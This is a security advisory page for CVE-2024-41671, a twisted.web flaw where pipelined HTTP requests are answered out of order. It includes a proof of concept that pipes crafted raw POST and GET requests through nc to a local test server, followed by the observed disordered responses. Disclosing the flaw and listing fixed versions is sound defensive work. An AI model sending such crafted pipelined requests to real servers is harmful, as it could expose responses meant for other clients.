CVE-2024-41671: twisted.web has disordered HTTP pipeline response

Published Jul 29, 2024
·
Updated

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC 0. Start a fresh Debian container: sh docker run --workdir /repro --rm -it debian:bookworm-slim 1. Install twisted and its dependencies: sh apt -y update && apt -y install ncat git python3 python3-pip \ && git clone --recurse-submodules https://github.com/twisted/twisted \ && cd twisted \ && pip3 install --break-system-packages . 2. Run a twisted.web HTTP server that echos received requests' methods. e.g., the following: python from twisted.web import server, resource from twisted.internet import reactor

class TheResource(resource.Resource): isLeaf = True

def renderGET(self, request) -> bytes: return b"GET"

def renderPOST(self, request) -> bytes: return b"POST"

site = server.Site(TheResource()) reactor.listenTCP(80, site) reactor.run() 3. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection: sh (printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80 4. Observe that the responses arrive out of order: HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:41 GMT Content-Length: 5 Content-Type: text/html

POST HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 4 Content-Type: text/html

GET HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 5 Content-Type: text/html

POST

Impact See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

Other sources

Twisted is an event-based framework for internet applications, supporting Python 3.6+. The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure. This vulnerability is fixed in 24.7.0rc1.

NVD

twisted.web has disordered HTTP pipeline response

Microsoft

Affected Software

6 affected componentsFixes available
pip/twisted<=24.3.0
24.7.0rc1
debian/twisted<=20.3.0-7+deb11u1
20.3.0-7+deb11u222.4.0-4+deb12u124.11.0-1
Microsoft azl3 python-twisted 22.10.0-3
Microsoft cbl2 python-twisted 22.10.0-4
Microsoft cbl2 python-twisted 22.10.0-3
Microsoft azl3 python-twisted 22.10.0-4

Event History

Jul 29, 2024
CVE Published
via MITRE·02:37 PM
Data Sourced
via MITRE·02:37 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·03:15 PM
DescriptionSeverityWeakness
Advisory Published
via GitHub·04:33 PM
Aug 18, 2024
Data Sourced
via Microsoft·07:00 AM
DescriptionSeverityWeakness
Data Sourced
via Microsoft·07:00 AM
Affected Software
Updated
via Microsoft·07:00 AM
Affected Software
Updated
via Microsoft·07:00 AM
DescriptionSeverity
Nov 30, 2024
Data Sourced
via Ubuntu·09:20 PM
RemedyDescriptionSeverityAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2024-41671?

CVE-2024-41671 has been assigned a moderate severity level due to the potential for information disclosure.

2

How do I fix CVE-2024-41671?

To fix CVE-2024-41671, upgrade the 'twisted' package to version 24.7.0rc1 or later.

3

Which versions of 'twisted' are affected by CVE-2024-41671?

Versions of 'twisted' up to and including 24.3.0 are affected by CVE-2024-41671.

4

Is there a specific platform or environment where CVE-2024-41671 is a concern?

CVE-2024-41671 primarily affects applications using the 'twisted.web' server in HTTP 1.0 and 1.1 context.

5

Can CVE-2024-41671 lead to security issues beyond information disclosure?

CVE-2024-41671 focuses on information disclosure; however, improper handling of HTTP pipelined requests could lead to further security complications.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203